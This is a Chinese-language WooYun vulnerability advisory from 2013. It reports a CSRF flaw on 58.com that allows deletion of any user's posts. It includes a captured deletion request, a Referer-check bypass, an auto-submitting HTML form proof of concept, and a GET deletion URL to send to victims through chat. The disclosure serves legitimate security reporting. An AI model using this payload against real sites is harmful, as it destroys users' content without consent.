当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020862

漏洞标题:58同城可猥琐方式删除任意用户帖子

相关厂商:58同城

漏洞作者: se55i0n

提交时间:2013-03-29 09:21

修复时间:2013-05-13 09:21

公开时间:2013-05-13 09:21

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-29: 细节已通知厂商并且等待厂商处理中
2013-03-29: 厂商已经确认,细节仅向厂商公开
2013-04-08: 细节向核心白帽子及相关领域专家公开
2013-04-18: 细节向普通白帽子公开
2013-04-28: 细节向实习白帽子公开
2013-05-13: 细节向公众公开

简要描述:

58的大牛送一对公仔呗!

详细说明:

1)用户帖子ID信息泄露(后面删帖用到)、userid信息泄露(可与上个洞子配合使用);
1.1)发表一个帖子如下图所示;

1.png


1.2)在个人中心查看帖子信息;

2.png


1.3)看出来了吧,帖子的的页面地址为“帖子ID+x.shtml”,所以x前面的编号即为帖子ID;
1.4)使用另一用户查看刚发布的帖子,点击查看"该用户电话发帖记录",发现了用户的userid信息;

4.png


2)可猥琐删除任意用户帖子;
2.1)来到用户中心,点击删除刚发布的帖子并抓包;

POST /submit/infopost/?op=close HTTP/1.1
Host: my.58.com
Proxy-Connection: keep-alive
Content-Length: 18
Accept: text/plain, */*
Origin: http://my.58.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Content-Type: application/x-www-form-urlencoded
Referer: http://my.58.com/index/?pts=1364491912016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie:...
ids=13374799021446


2.2)系统校验了referer但是校验不严格,通过形如“my.58.com.xxx.org”之类即可绕过防御,所以通过访问以下POC即可删除用户对应帖子;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://my.58.com/submit/infopost/?op=close" method="POST">
<input type="text" name="ids" value="13374799021446" >
<input type="submit" value="submit" />
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


2.3)没有完,更猥琐的在这里,发现居然还能通过GET方式来提交删帖请求(不应该哟);

http://my.58.com/submit/infopost/?op=close&ids=13374799021446


2.5)再配合58同城的帮帮,在线交流,哈哈;

8.png


2.6)用户访问即可删帖,看效果;

6.png


2.7)返回用户中心,刷新下帖子真没了;

7.png


漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-03-29 11:30

厂商回复:

非常感谢提交漏洞,马上修复!

最新状态:

暂无